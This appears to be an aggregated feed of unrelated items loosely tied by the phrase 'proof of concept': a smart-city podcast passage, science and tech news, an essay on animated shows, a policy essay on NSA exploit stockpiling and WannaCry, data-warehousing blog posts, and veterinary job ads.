Upton:Yes, also it’s important to note that it differs almost by country to country and almost within region to region within countries. The interesting challenge with smart cities is that often you're dealing with elected officials rather than hard-nosed businessman who are only interested in the financial return. And it's because you're dealing with politicians and they are therefore representing the citizens in their area, either their city or their town or their region, their priorities are not always the same.

There is quite a variation of one of the particular challenges, particular social challenges as well as the particular quality of life challenges in each of the areas that they work in. So things like personal safety are a very big deal in some regions. I am currently in Tokyo and here there is much more concern around quality of life and mobility with a rapidly aging population and their challenges are somewhat different.
IoT Solutions for Communications Service Providers and Enterprises from HPE
Learn More
But in India, the set of opportunities and challenges that are set out, they are in that combination of economic as well as social, and if you solve them and you essentially give citizens more peace of mind, more ability to be able to move freely, to be able to take part in the economic interaction within that area, then undoubtedly that leads to greater growth, but it is worth bearing in mind that it does vary almost city by city and region by region.

Gardner:Shridhar, do you have any other input into a cascading ongoing set of benefits when you get more data, more network opportunity. I guess I am trying to understand for a longer-term objective that being intelligent and data-driven has an ongoing set of benefits, what might those be? How can this be a long-term data and analytics treasure trove when you think about it in terms of how to provide better urban experiences?

Home/work help

Shridhar:From our perspective, when we looked at the customer benefits there is a huge amount of focus around the smart cities and how smart cities are benefiting from a network. If you look at the enterprise customers, they are also looking at safety, which is an overlapping application that a smart city would have.

So the enterprise wants to provide safety to its workers, for example, in mines or in difficult terrains, environments where they are focusing on helping them. Or women’s safety, which is as you know in India is a big thing as well -- how do you provide a device which is not very obvious and it gives the women all the safety that is there.

So all this in some form is providing data. One of the things that comes to my mind when you ask about how data-driven resources can be and what kind of quality it would give is if you action your mind to some of the customer services devices, there could be applications or let’s say a housewife could have a multiple button kind of a device where she can order a service.

Depending on the service she presses and an aggregate of households across India, you would know the trends and direction of a certain service, and mind you, it could be as simple as a three-button device which says Service A, Service B, Service C, and it could be a consumer service that gets extended to a particular household that we sell it as a service.

So you could get lots of trends and patterns that are emerging from that, and we believe that the customer experience is going to change, because no longer is a customer going to retain in his mind what kind of phone numbers or your, let's say, apps and all to order, you give them the convenience of just a button-press service. That immediately comes to my mind.

Feedback fosters change

The second one is in terms of feedback. You use the same three-button service to say, how well have you used utility -- or rather how -- what kind of quality of service that you rate multiple utilities that you are using, and there is toilet revolution in India. For example, you put these buttons out there, they will tell you at any given point of time what’s the user satisfaction and so on.

So these are all data that is getting gathered and I believe that while it is early days for us to go on and put out analytics and give you distinct kind of benefits that are there, but some of the things that customers are already looking at is which geographies, which segment, who are my biggest -- profile of the customers using this and so on. That kind of information is going to come out very, very distinctly.

The Smart Cities is all about experience. The enterprises are now looking at the data that is coming out and seeing how they can use it to better segment, and provide better customer experience which would obviously mean both adding to their top line as well as helping them manage their bottom line. So it's beyond safety, it's getting into the customer experience – the realm of managing customer experience.

Gardner:From a go-to-market perspective, or a go-to-city’s perspective, these are very complex undertakings, lots of moving parts, lots of different technologies and standards. How are Tata and HPE are coming together -- along with other service providers, Pointnextfor example? How do you put this into a package that can then actually be managed and put in place? How do we make this appealing not only in terms of its potential but being actionable as well when it comes to different cities and regions?

Upton:The concept of Smart Cities has been around for a while and various governments around the world have pumped money into their cities over an extended period of time.
We now have the infrastructure in place, we have the price points and we have IoT becoming mainstream.

As usual, these things always take more time than you think, and I do not believe today that we have a technology challenge on our hands. We have much more of a business model challenge. Being able to deploy technology to be able to bring benefits to citizens, I think that is finally getting to the point where it is much better understood where innovation of the device level, whether it's streetlights, whether it's the ability to measure water quality, sound quality, humidity, all of these metrics that we have available to us now. There has been very rapid innovation at that device level and at the economics of how to produce them, at a price that will enable widespread deployment.

All that has been happening rapidly over the last few years getting us to the point where we now have the infrastructure in place, we have the price points in place, and we have IoT becoming mainstream enough that it is entering into the manufacturing process of all sorts of different devices, as I said, ranging from streetlights to personal security devices through to track and trace devices that are built into the manufacturing process of goods.
That is now reaching mainstream and we are now able to take advantage of this massive data that’s now being produced to be able to produce even more efficient and smarter cities, and make them safer places for our citizens.

Gardner:Last word to you, Shridhar. If people wanted to learn more about the pilot proof of concept (PoC) that you are doing there at Jamshedpur and other cities, through the Smart Cities Mission, where might they go, are there any resources, how would you provide more information to those interested in pursuing more of these technologies?

Pilot projects take flight

Shridhar:I would be very happy to help them look at the PoCs that we are doing. I would classify the PoCs that we are doing is as far as safety is concerned, we talked of energy management in one big bucket that is there, then the customer service I spoke about, the fourth one I would say is more on the utility side. Gas and water are two big applications where customers are looking at these PoCs very seriously.

And there is very one interesting application in that one customer wanted for pest control, where he wanted his mouse traps to have sensors so that they will at any point of time know if there is a rat trap at all, which I thought was a very interesting thing.
IoT Solutions for Communications Service Providers and Enterprises from HPE
Learn More
There are multiple streams that we have, we have done multiple PoCs, we will be very happy as Tata Communications team [to provide more information], and the HPE folks are in touch with us.

You could write to us, to me in particular for some period of time. We are also putting information on our website. We have marketing collateral, which describes this. We will do some of the joint workshops with HPE as well.

So there are multiple ways to reach us, and one of the best ways obviously is through our website. We are always there to provide more important help, and we believe that we can’t do it all alone; it’s about the ecosystem getting to know and getting to work on it.

While we have partners like HPE on the platform level, we also have partners such as Semtech, who established Center of Excellence in Mumbai along with us. So the access to the ecosystem from HPE side as well as our other partners is available, and we are happy to work and co-create the solutions going forward.


          New Draft Guidance Issued by FDA for Animal Studies for Medical Devices        
The United States Food and Drug Administration has issued a new draft guidance that highlights suggested industry procedures and practices while reporting as well as conducting animal studies for medical devices. The most recent guidance will be kept open for the public to comment upon over the next 90 days. It was released following a paper by the University of Edinburgh, which indicated that researchers are not doing their due diligence to eliminate potential bias from animal testing. This, they said, could possibly be compromising on the authenticity of their findings.  During the first phase of device or drug development, researchers test the given product on animal systems in order to analyze the possible safety concerns. This could also be done to ascertain or show proof of concept in a living system. Biased or flawed animal testing, even if unintentional, misrepresents the findings of the research. This could result in failed clinical trials conducted with human subjects and even massive losses of time and money.  Led by Malcom Macleod, a team of researchers from the University of Edinburgh surveyed thousands of animal studies that had been peer reviewed and discovered that a major section of authors were not doing enough to make certain good research practices were being followed. The findings were published in PLOS Biology and suggested that two thirds of the animal studies being conducted in the United Kingdom had a rather questionable authenticity owing to poor research design.  Speaking to The Guardian, Macleod said that researchers could definitely do a lot more to ensure good research practice. If researchers do their due diligence, science will become stronger in terms of findings being translatable into new disease treatments. Some of the major concerns Macleod had were that studies blindly evaluated animal health at the time of conclusion of the treatments, failed to randomize animals into treatment and control groups, or did not keep a record of animals that were eliminated from the studies.

Original Post New Draft Guidance Issued by FDA for Animal Studies for Medical Devices source Twease
          Japan Makes Headway in Fashionable Hi-Tech Wearable        
Hi-tech wearables or smart wearables are a nascent technology, and none of these technologies comprises function, fashion and battery life that is expected of the product. To have it all is not a reality yet! What has been achieved so far is a combination of either function and fashion, or battery and fashion, or even fashion and function which leaves room to advance further for the desired product. In the smart technology wearables arena, several college students in Japan are on the go to design smart wearable fashion accessories. The idea of the drive is to support “scientific girls”, an initiative undertaken by Recruit Technologies, Advanced Technology Lab, and Rikejo University. The educational institutions throughout Japan are underway to promote technology education among women. Fashion is seen all over Japan. The idea of the project to inspire women to create smart technology accessories keeping with fashion seems apt for the initiative. It is true the idea may not be at par with ‘Android wearable’ or ‘Apple watch’, but it is surely the beginning of several proof of concept that may lead to design and creation of decorative accessories such as hair-bands, bracelets, and necklaces. Japan has been at the forefront for developing wearable accessories which has lot to offer. The fact is supported by zealous enthusiasm and participation from students around colleges in Japan for smart fashionable models which were created in a time of fewer months.  In general, STEM which stands for Science, Technology, Engineering and Mathematics careers are promoted for women worldwide but this one is particularly important in Japan due to a mishap that is related to the initiative. A stem cell research report by a prominent female researcher Dr Haruko Obakata and her associate Dr Yoshiki Sasai was caught in a controversy which led the latter to commit suicide.

Original Post Japan Makes Headway in Fashionable Hi-Tech Wearable source Twease
          "All Ages" Means ALL Ages: For Adults who Watch Kids' Cartoons        

My family saw television as a shared activity: we watched CSI: Las Vegas at dinner, and House before bed. As large a unifying role as television played in my childhood, one type of programming never made the cut: animation. My parents, like many adults, didn’t consider animation a medium that held value.

Despite the fact that adults in America have watched cartoons for a long time – The Simpsons first aired in 1989 and has secured renewal until 2019 – the association of cartoons as being only for children still prevails.

And yet, older teenagers and millennial adults are watching more animated shows, despite the stigma of immaturity. Moreover, they are watching actual kid’s cartoons, not animated adult programming à la The Simpsons, and with no children of their own to watch with them. Some adults are driven by nostalgia: reboots of classics like Teen Titans Go! draw in older fans of the original series with in-jokes and references. But new cartoons without the cultural clout of a popular predecessor have also amassed huge adult audiences.

Steven Universe, a show without forerunner, occupied two spots in the top 15 cable broadcasts the day it debuted its fifth season, proving its popularity with audiences of all ages. Notable for its more-than-subtextual queer themes, the series has a fandom fiercely protective of its queer representation. To see yourself reflected in the media you consume, is to have your existence validated. To see yourself represented thoughtfully, with complexity and authenticity, is to have your humanity validated. Representation in media matters. Steven Universe is popular, then, not regardless of the romance between femme-presenting aliens and subversion of gender norms, but in part because of it.

A step further lies Danger & Eggs. Like Steven Universe, the LGBTQ-inclusive Danger & Eggs has accumulated a following that spans all ages. Of all the queer representation in shows animated and live action alike, the final episode of Danger & Eggs’ first season has to be one of the most prominent, starring the most diverse spectrum of LGBTQ characters. Titled “Chosen Family,” the episode takes place at a Pride Festival and deals with themes of (you guessed it) chosen family, featuring a smorgasbord of celebratory LGBTQ imagery.

In a society that evaluates worth against a monetary ruler, supporting shows with well-crafted representation pushes back against long-standing negative tropes that reinforce patterns of inequality. The popularity of an inclusive show is proof of concept for networks concerned about profitability, and opens the door for the creation of even more inclusive content.

But ultimately, adult viewers watch Steven Universe and Danger & Eggs because they genuinely enjoy it. In a soundtrack full of silliness, Steven Universe also includes songs that ruminate on loss. Interspersed between fast-paced, gleeful jokes, Danger & Eggs delivers gems like, “Identity takes time.” These shows feel cathartic to watch. If media reflects life, these cartoons imbue their reflected worlds with endless optimism: even in the midst of conflict, the light at the end of the tunnel approaches.

Moreover, the purpose of fiction has always been to transport us from the familiarity of our lives. For demographics who feel consistently unsafe or unwelcome in the “real world,” this respite is significant: viewing a place where queer identity doesn’t preclude happy endings feels good. So watching the likes of Steven Universe and Danger & Eggs can be an act of emotional self-care for those experiencing minority stress. In the iconic words of Audre Lorde, “Caring for myself is not self-indulgence, it is self-preservation, and that is an act of political warfare.”

My family still doesn’t watch cartoons when we gather in the living room, though I rarely hear remarks now if my parents peek animation streaming on my laptop. Our conversations about LGBTQ issues are more likely to stem from the crime drama How to Get Away with Murder than an animated show like Danger & Eggs. But I’m still going to watch these “children’s” cartoons, because they are uplifting and restorative, stickin’ it to the status quo 22 minutes at a time.

August 9, 2017

          Building Stories - Suggested Reading Order        
There had to be an asshole; it had to be me. Forgive the proof of concept-y nature of this skeletal post -- I'm hoping to expand this into an essay and thusly review the comic 'n shit -- and do enjoy this suggested navigation for your Building Stories experience. It's designed to preserve surprises, evade narrative tedium, and *totally make you cry, you baby* throughout the course of Chris Ware's fascinating, flawed toy box of anxieties and reminisce:

0. [THAT GIVEAWAY PREVIEW COMIC, LANDSCAPE FORMAT, IF YOU HAVE IT]

1. [THE LITTLE GOLDEN BOOK] - collecting the New York Times serial

2. [THE 'PRE-CHILD' ACCORDION FOLDOUT] - start on the side reading "I don't care..."

3. "The Daily Bee"

4. [THE THICKER BROADSHEET MAGAZINE] - starts with "god"

5. [THE OLD LADY'S SOLO COMIC]

6. [THE 'POST-CHILD' ACCORDION FOLDOUT] - start on the side reading "Her laugh is..."

7. [THE DOUBLE-SIDED 'POSTER'] - start on the side reading "As a kid,"

8. [THE THINNER BROADSHEET MAGAZINE] - reprinting the Kramers Ergot 7 story (and more)

9. [THE GREEN HARDCOVER BOOK]- reprinting ACME Novelty Library #18, w' edits

10. "Branford - the Best Bee in the World"

11. [THE 'BOARD GAME']

12. [THE YOUNG WIFE'S SOLO ISSUE]

13. "Disconnect"

14. [THE WORDLESS LANDSCAPE COMIC]

More later, maybe...
          US Government Malware Policy Puts Everyone At Risk        
The NSA was weaponizing software vulnerabilities that it should have been helping to fix.

Last month, a massive ransomware attack hit computers around the globe, and the government is partly to blame.

The malicious software, known as “WannaCry,” encrypted files on users’ machines, effectively locking them out of their information, and demanded a payment to unlock them. This attack spread rapidly through a vulnerability in a widely deployed component of Microsoft's Windows operating system, and placed hospitals, local governments, banks, small businesses, and more in harm's way.

This happened in no small part because of U.S. government decisions that prioritized offensive capabilities — the ability to execute cyberattacks for intelligence purposes — over the security of the world’s computer systems. The decision to make offensive capabilities the priority is a mistake. And at a minimum, this decision is one that should be reached openly and democratically. A bill has been proposed to try to improve oversight on these offensive capabilities, but oversight alone may not address the risks and perverse incentives created by the way they work. It’s worth unpacking the details of how these dangerous weapons come to be.

Why did it happen?

All complex software has flaws — mistakes in design or implementation — and some of these flaws rise to the level of a vulnerability, where the software can be tricked or forced to do something that it promised its users it would not do.

For example, consider one computer, running a program designed to receive files from other computers over a network. That program has effectively promised that it will do no more than receive files. If it turns out that a bug allows another computer to force that same program to delete unrelated files, or to run arbitrary code, then that flaw is a security vulnerability. The flaw exploited by WannaCry is exactly such a vulnerability in part of Microsoft’s Windows operating system, and it has existed (unknown by most people) for many years, possibly as far back as the year 2000.

When researchers discover a previously unknown bug in a piece of software (often called a “zero day”), they have several options:

  1. They can report the problem to the supplier of the software (Microsoft, in this case).
  2. They can write a simple program to demonstrate the bug (a “proof of concept”) to try to get the software supplier to take the bug report seriously.
  3. If the flawed program is free or open source software, they can develop a fix for the problem and supply it alongside the bug report.
  4. They can announce the problem publicly to bring attention to it, with the goal of increasing pressure to get a fix deployed (or getting people to stop using the vulnerable software at all).
  5. They can try to sell exclusive access to information about the vulnerability on the global market, where governments and other organizations buy this information for offensive use.
  6. They can write a program to aggressively take advantage of the bug (an “exploit”) in the hopes of using it later to attack an adversary who is still using the vulnerable code.

Note that these last two actions (selling information or building exploits) are at odds with the first four. If the flaw gets fixed, exploits aren't as useful and knowledge about the vulnerability isn't as valuable.

Where does the U.S. government fit in?

The NSA didn’t develop the WannaCry ransomware, but they knew about the flaw it used to compromise hundreds of thousands of machines. We don't know how they learned of the vulnerability — whether they purchased knowledge of it from one of the specialized companies that sell the knowledge of software flaws to governments around the world, or from an individual researcher, or whether they discovered it themselves. It is clear, however, that they knew about its existence for many years. At any point after they learned about it, they could have disclosed it to Microsoft, and Microsoft could have released a fix for it. Microsoft releases such fixes, called “patches,” on a roughly monthly basis. But the NSA didn't tell Microsoft about it until early this year.

Instead, at some point after learning of the vulnerability, the NSA developed or purchased an exploit that could take advantage of the vulnerability. This exploit — a weapon made of code, codenamed “ETERNALBLUE,” specific to this particular flaw — allowed the NSA to turn their knowledge of the vulnerability into access to others’ systems. During the years that they had this weapon, the NSA most likely used it against people, organizations, systems, or networks that they considered legitimate targets, such as foreign governments or their agents, or systems those targets might have accessed.

The NSA knew about a disastrous flaw in widely used piece of software – as well as code to exploit it — for over five years without trying to get it fixed. In the meantime, others may have discovered the same vulnerability and built their own exploits.

Any time the NSA used their exploit against someone, they ran the risk of their target noticing their activity by capturing network traffic — allowing the target to potentially gain knowledge of an incredibly dangerous exploit and the unpatched vulnerability it relied on. Once someone had a copy of the exploit, they would be able to change it to do whatever they wanted by changing its “payload” — the part of the overall malicious software that performs actions on a targeted computer. And this is exactly what we saw happen with the WannaCry ransomware. The NSA payload (a software “Swiss Army knife” codenamed DOUBLEPULSAR that allowed NSA analysts to perform a variety of actions on a target system) was replaced with malware with a very specific purpose: encrypting all a users’ data and demanding ransom.

At some point, before WannaCry hit the general public, the NSA learned that the weapon they had developed and held internally had leaked. Sometime after that, someone alerted Microsoft of the problem, kicking off Microsoft’s security response processes. Microsoft normally credits security researchers by name or “handle” in their security updates, but in this case, they are not saying who told them. We don't know whether the weapon leaked earlier, of course — or whether anyone else had independently discovered knowledge of the vulnerability and used it (with this particular exploit or another one) to attack other computers. And neither does the NSA. What we do know is that everyone in the world running a Windows operating system was vulnerable for years to anyone who knew about the vulnerability; that the NSA had an opportunity to fix that problem for years; and that they didn't take steps to fix the problem until they realized that their own data systems had been compromised.

A failure of information security

The NSA is ostensibly responsible for protecting the information security of America, while also being responsible for offensive capabilities. “Information Assurance” (securing critical American IT infrastructure) sits next to “Signals Intelligence” (surveillance) and “Computer Network Operations” (hacking/infiltration of others’ networks) right in the Agency’s mission statement. We can see from this fiasco where the priorities of the agency lie.

And the NSA isn’t the only agency charged with keeping the public safe but putting us all at risk. The FBI also hoards knowledge of vulnerabilities and maintains a stockpile of exploits that take advantage of them. The FBI’s mission statement says that it works “to protect the U.S. from terrorism, espionage, cyberattacks….” Why are these agencies gambling with the safety of public infrastructure?

The societal risks of these electronic exploits and defenses can be seen clearly by drawing a parallel to the balance of risk with biological weapons and public health programs.

If a disease-causing micro-organism is discovered, it takes time to develop a vaccine that prevents it. And once the vaccine is developed, it takes time and logistical work to get the population vaccinated. The same is true for a software vulnerability: it takes time to develop a patch, and time and logistical work to deploy the patch once developed. A vaccination program may not ever be universal, just as a given patch may not ever be deployed across every vulnerable networked computer on the planet.

It’s also possible to take a disease-causing micro-organism and “weaponize” it — for example, by expanding the range of temperatures at which it remains viable, or just by producing delivery “bomblets”capable of spreading it rapidly over an area. These weaponized germs are the equivalent of exploits like ETERNALBLUE. And a vaccinated (or "patched") population isn't vulnerable to the bioweapon anymore.

Our government agencies are supposed to protect us. They know these vulnerabilities are dangerous. Do we want them to delay the creation of vaccine programs, just so they can have a stockpile of effective weapons to use in the future?

What if the Centers for Disease Control and Prevention were, in addition to its current mandate of protecting “America from health, safety and security threats, both foreign and in the U.S.,” responsible for designing and stockpiling biological weapons for use against foreign adversaries? Is it better or worse for the same agency to be responsible for both defending our society and for keeping it vulnerable? What should happen if some part of the government or an independent researcher discovers a particularly nasty germ — should the CDC be informed? Should a government agency that discovers such a germ be allowed to consider keeping it secret so it can use it against people it thinks are "bad guys" even though the rest of the population is vulnerable as well? What incentive does a safety-minded independent researcher have to share such a scary discovery with the CDC if he or she knows the agency might decide to use the dangerous information offensively instead of to protect the public health?

What if a part of the government were actively weaponizing biological agents, figuring out how to make them disperse more widely, or crafting effective delivery vehicles?

These kinds of weapons cannot be deployed without some risk that they will spread, which is why bioweapons have been prohibited by international convention for over 40 years. Someone exposed to a germ can culture it and produce more of it. Someone exposed to malware can make a copy, inspect it, modify it, and re-deploy it. Should we accept this kind of activity from agencies charged with public safety? Unfortunately, this question has not been publicly and fully debated by Congress, despite the fact that several government agencies stockpile exploits and use them against computers on the public network.

Value judgments that should not be made in secret

Defenders of the FBI and the NSA may claim that offensive measures like ETERNALBLUE are necessary when our government is engaged in espionage and warfare against adversaries who might also possess caches of weaponized exploits for undisclosed vulnerabilities. Even the most strident supporters of these tactics, however, must recognize that in the case of ETERNALBLUE and the underlying vulnerability it exploits, the NSA failed as stewards of America's — and the world's — cybersecurity, by failing to disclose the vulnerability to Microsoft to be fixed until after their fully weaponized exploit had fallen into unknown hands. Moreover, even if failing to disclose a vulnerability is appropriate in a small subset of cases, policy around how these decisions are made should not be developed purely by the executive branch behind closed doors, insulated from public scrutiny and oversight.

A bipartisan group of US Senators has introduced a bill called the Protecting our Ability To Counter Hacking (PATCH) Act, which would create a Vulnerabilities Equities Review Board with representatives from DHS, NSA, and other agencies to assess whether any known vulnerability should be disclosed (so that it can be fixed) or kept secret (thereby leaving our communications systems vulnerable). If the government plans to retain a cache of cyberweapons that may put the public at risk, ensuring that there is a permanent and more transparent deliberative process is certainly a step in the right direction. However, it is only one piece of the cybersecurity puzzle. The government must also take steps to ensure that any such process fully considers the duty to secure our globally shared communications infrastructure, has a strong presumption in favor of timely disclosure, and incentivizes developers to patch known vulnerabilities.

This will not be the last time one of these digital weapons leaks or is stolen, and one way to limit the damage any one of them causes is by shortening the lifetime of the vulnerabilities they rely on.


          Chef de Projet Big Data (H/F)        
Page Personnel recrute, pour son client, une entreprise des Alpes-Maritimes spécialisée dans les infrastructures électriques et numériques du bâtiment, un Chef de Projet Big Data, qui sera en charge de mettre en place une solution de traitement Big Data (Braincube), sur le site de production. Rattaché au Service Maintenance, le Chef de Projet Big Data occupera un rôle transversal dans la réalisation du POC (Proof of Concept), et aura ...
          Proof of Concept: Ideen auf dem Prüfstand        
Wer nicht gerade tagein tagaus mit Unternehmensgründungen zu tun hat oder in der Forschung und Entwicklung arbeitet, der dürfte bei dem Begriff Proof of Concept ziemlich ins Schlingern geraten. Glücklicherweise kommt er im alltäglichen Leben nicht vor; zumindest ist er mir hier noch nicht untergekommen. Jedoch könnte er uns im Büro schon einmal über den Weg laufen – und dann sollten wir vorbereitet sein. Ein Proof of Concept ist ein Beweis, dass ein bestimmtes Vorhaben
          The ParAccel TPC-H Benchmark Controversy        

ParAccel, one of the new analytic DBMS vendors, recently announced some impressive TPC-H benchmark results. A good review of these results can be found on Merv Adrian's blog at this link.

Not everyone agreed with Merv's balanced review. Curt Monash commented that "The TPC-H benchmark is a blight upon the industry." See his blog entry at this link.

This blog entry resulted in some 41 (somewhat heated) responses. At one point Curt made some negative comments about ParAccel's VP of Marketing, Kim Stanick, which in turn led to accusations that his blog entry was influenced by personal feelings.

I have two comments to make about this controversy. The first concerns the TPC-H benchmark and the second is about an increasing lack of social networking etiquette by analysts.

TPC benchmarks have always been controversial. People often argue that that do not represent real life workloads. What this really means is that you mileage may vary. These benchmarks are expensive to run and vendors throw every piece of technology at the benchmark in order to get good results. Some vendors are rumored to have even added special features to their products to improve the results. The upside of the benchmarks is that they are audited and reasonably well documented.

The use of TPC benchmarks has slowed over recent years. This is not only because they are expensive to run, but also because they have less marketing impact than in the past. In general, they have been of more use to hardware vendors because they demonstrate hardware scalability and provide hardware price/performance numbers. Oracle was perhaps an exception here because they liked to run full-page advertisements saying they were the fastest database system in existence.

TPC benchmarks do have some value to both the vendor and the customer. The benefits to the vendor are are increased visibility and credibility. Merv Adrian described this as a "rite of passage." It helps the vendor get on the short list. For the customer these benchmarks show the solution to be credible and scalable. All products work well in PowerPoint, but the TPC benchmarks demonstrate that the solution is more than just vaporware.

I think most customers are knowledgeable enough to realize that the benchmark may not match their own workloads or scale as well in their own environments. This is where the proof of concept (POC) benchmark comes in. The POC enables the customer to evaluate the product using their own workloads.

TPC benchmarks are not perfect, but they do provide some helpful information in the decision making process.

I will address the issue of blog etiquette in a separate blog entry.  




          Data Warehousing in the Cloud Gains Momentum        

The use of cloud computing for data warehousing is getting a lot of attention from vendors. Following hot on the heels of Vertica's Analytic Database v3.0 for the Cloud announcement on June 1 was yesterday's Greenplum announcement of its Enterprise Data Cloud™ platform and today's announcement by Aster of .NET MapReduce support for its nCluster Cloud Edition.

I have interviewed all three vendors over the past week and while there are some common characteristics in the approaches being taken by the three vendors to cloud computing, there are also some differences.

Common characteristics include:

  • Software only analytic DBMS solutions running on commodity hardware
  • Massively parallel processing
  • Focus on elastic scaling, high availability through software, and easy administration
  • Acceptance of alternative database models such as MapReduce
  • Very large databases supporting near-real-time user-facing applications, scientific applications, and new types of business solution
The emphasis of Greenplum is on a platform that enables organizations to create and manage data warehouses and data marts using a common pool of physical, virtual or public cloud infrastructure resources. The concept here is that multiple data warehouses and data marts are a fact life and the best approach is to put these multiple data stores onto a common and flexible analytical processing platform that provides easy administration and fast deployment using good enough data. Greenplum sees this approach being used initially on private clouds, but the use of public clouds growing over time.

Aster's emphasis is on extending analytical processing to the large audience of Java, C++ and C# programmers who don't know SQL. They see these developers creating custom analytical MapReduce functions for use by BI developers and analysts who can use these functions in SQL statements without any programming involved.

Although MapReduce has typically been used by Java programmers, there is also a large audience of Microsoft .NET developers who potentially could use MapReduce. A recent report by Forrester, for example, shows 64% of organizations use Java and 43% use C#. The objective of Aster is to extend the use of MapReduce from web-centric organizations into large enterprises by improving its programming, availability and administration capabilities over and above open source MapReduce solutions such as HADOOP.

Vertica see its data warehouse cloud computing environment being used for proof of concept projects, spill over capacity for enterprise projects and for software-as-service (SaaS) applications. Like Greenplum it supports virtualization. Its Analytic Database v3.0 for the Cloud adds support for more cloud platforms including Amazon Machine Images and early support for the Sun Compute Cloud. It also adds several cloud-friendly administration features based on open source solutions such as Webmin and Ganglia.

It is important for organizations to understand where cloud computing and new approaches such as MapReduce fit into the enterprise data warehousing environment. Over the course of the next few months my monthly newsletter on the BeyeNETWORK will look at these topics in more detail and review the pros and cons of these new approaches.


          Hubble to Proceed with Full Search for New Horizons Targets        

Planetary scientists have successfully used the Hubble Space Telescope to boldly look out to the far frontier of the solar system to find suitable targets for NASA's New Horizons mission to Pluto. After the marathon probe zooms past Pluto in July 2015, it will travel across the Kuiper Belt - a vast rim of primitive ice bodies left over from the birth of our solar system 4.6 billion years ago. If NASA approves, the probe could be redirected to fly to a Kuiper Belt object (KBO) and photograph it up close.

As a first step, Hubble found two KBOs drifting against the starry background. They may or may not be the ideal target for New Horizons. Nevertheless, the observation is proof of concept that Hubble can go forward with an approved deeper KBO search, covering an area of sky roughly the angular size of the full Moon. The exceedingly challenging observation amounted to finding something no bigger than Manhattan Island, and charcoal black, located 4 billion miles away.


          (USA-GA-DULUTH) Technical Manager - Dairy        
Boehringer Ingelheim is an equal opportunity global employer who takes pride in maintaining a diverse and inclusive culture. We embrace diversity of perspectives and strive for an inclusive environment which benefits our employees, patients and communities. **Description:** Responsible for providing technical direction and oversight for the application of existing and developing products in the marketing area. As an employee of Boehringer Ingelheim, you will actively contribute to the discovery, development and delivery of our products to our patients and customers. Our global presence provides opportunity for all employees to collaborate internationally, offering visibility and opportunity to directly contribute to the companies' success. We realize that our strength and competitive advantage lie with our people. We support our employees in a number of ways to foster a healthy working environment, meaningful work, diversity and inclusion, mobility, networking and work-life balance. Our competitive compensation and benefit programs reflect Boehringer Ingelheim's high regard for our employees. **Duties & Responsibilities:** + Lead technical components of Proof of Concept for potential new products. Design, implement, and report market support trials. Mine the data and distill the information to relevant messages. Provide input on financial projections for new product opportunities. + Provide technical support to marketing on all promotional pieces, programs including reference check, development of key technical statements, competitive analysis, technical review including the routing process, and ensuring that materials pass regulatory and legal review. + Provide technical sales support to Field Sales through customer interactions, on-site customer training, and handling customer inquiries. + Generate written and oral technical communications including scientific papers and presentations at professional meetings. Ensure technical accuracy of promotional communications. + Liaisons with appropriate Key Opinion Leaders. Provide technical training (internal and external) as it relates directly or indirectly to BIVI products. Create sales tools such as PowerPoint presentations and technical bulletins. + Build, explain, and utilize economic modeling for production agricultural utilization. Translate scientific and production data into commercial economic impact. + Performs all Company business in accordance with all regulations (e.g., EEO, FDA, etc.) and Company policy and procedures. When violations are noted/observed they are to be immediately reported to management. Demonstrates high ethical and professional standards with all business contacts in order to maintain BIVI's excellent reputation within the animal health community and internally. **Requirements:** + Doctoral degree in Veterinary + One (1) to three (3) years project leadership/management experience + Minimum three (3) years’ experience in the animal health industry + Well-developed communication skills – verbal and written + Proven experience in trial design and conduction including basic understanding of statistical analysis. **Eligibility Requirements:** + Must be legally authorized to work in the United States without restriction. + Must be willing to submit to a background investigation, including verification of your past employment, criminal history, and educational background + Must be willing to take a drug test and post-offer physical (if required) + Must be 18 years of age or older **Our Culture:** Boehringer Ingelheim is a different kind of pharmaceutical company, a privately held company with the ability to have an innovative and long term view. Our focus is on scientific discoveries that improve patients' lives and we equate success as a pharmaceutical company with the steady introduction of truly innovative medicines. Boehringer Ingelheim is the largest privately held pharmaceutical corporation in the world and ranks among the world's 20 leading pharmaceutical corporations. At Boehringer Ingelheim, we are committed to delivering value through innovation. Employees are challenged to take initiative and achieve outstanding results. Ultimately, our culture and drive allows us to maintain one of the highest levels of excellence in our industry. Boehringer Ingelheim, including Boehringer Ingelheim Pharmaceuticals, Inc., Boehringer Ingelheim USA, Boehringer Ingelheim Roxane Inc., Roxane Laboratories Inc., Boehringer Ingelheim Chemicals, Boehringer Ingelheim Vetmedica Inc. Ben Venue Laboratories Inc. and Boehringer Ingelheim Fremont, Inc. is an equal opportunity employer. Minority/Female/Protected Veteran/Person with a Disability Boehringer Ingelheim is firmly committed to ensuring a safe, healthy, productive and efficient work environment for our employees, partners and customers. As part of that commitment, Boehringer Ingelheim conducts pre-employment background investigations and drug screenings. **Organization:** _US-Vetmedica_ **Title:** _Technical Manager - Dairy_ **Location:** _Americas-United States-GA-Duluth_ **Requisition ID:** _178704_
          (USA-GA-DULUTH) Technical Manager - Beef        
Boehringer Ingelheim is an equal opportunity global employer who takes pride in maintaining a diverse and inclusive culture. We embrace diversity of perspectives and strive for an inclusive environment which benefits our employees, patients and communities. **Description:** Responsible for providing technical direction and oversight for the application of existing and developing products in the marketing area. As an employee of Boehringer Ingelheim, you will actively contribute to the discovery, development and delivery of our products to our patients and customers. Our global presence provides opportunity for all employees to collaborate internationally, offering visibility and opportunity to directly contribute to the companies' success. We realize that our strength and competitive advantage lie with our people. We support our employees in a number of ways to foster a healthy working environment, meaningful work, diversity and inclusion, mobility, networking and work-life balance. Our competitive compensation and benefit programs reflect Boehringer Ingelheim's high regard for our employees. **Duties & Responsibilities:** + Lead technical components of Proof of Concept for potential new products. Design, implement, and report market support trials. Mine the data and distill the information to relevant messages. Provide input on financial projections for new product opportunities. + Provide technical support to marketing on all promotional pieces, programs including reference check, development of key technical statements, competitive analysis, technical review including the routing process, and ensuring that materials pass regulatory and legal review. + Provide technical sales support to Field Sales through customer interactions, on-site customer training, and handling customer inquiries. + Generate written and oral technical communications including scientific papers and presentations at professional meetings. Ensure technical accuracy of promotional communications. + Liaisons with appropriate Key Opinion Leaders. Provide technical training (internal and external) as it relates directly or indirectly to BIVI products. Create sales tools such as PowerPoint presentations and technical bulletins. + Build, explain, and utilize economic modeling for production agricultural utilization. Translate scientific and production data into commercial economic impact. + Performs all Company business in accordance with all regulations (e.g., EEO, FDA, etc.) and Company policy and procedures. When violations are noted/observed they are to be immediately reported to management. Demonstrates high ethical and professional standards with all business contacts in order to maintain BIVI's excellent reputation within the animal health community and internally. **Requirements:** + Doctoral degree in Veterinary + One 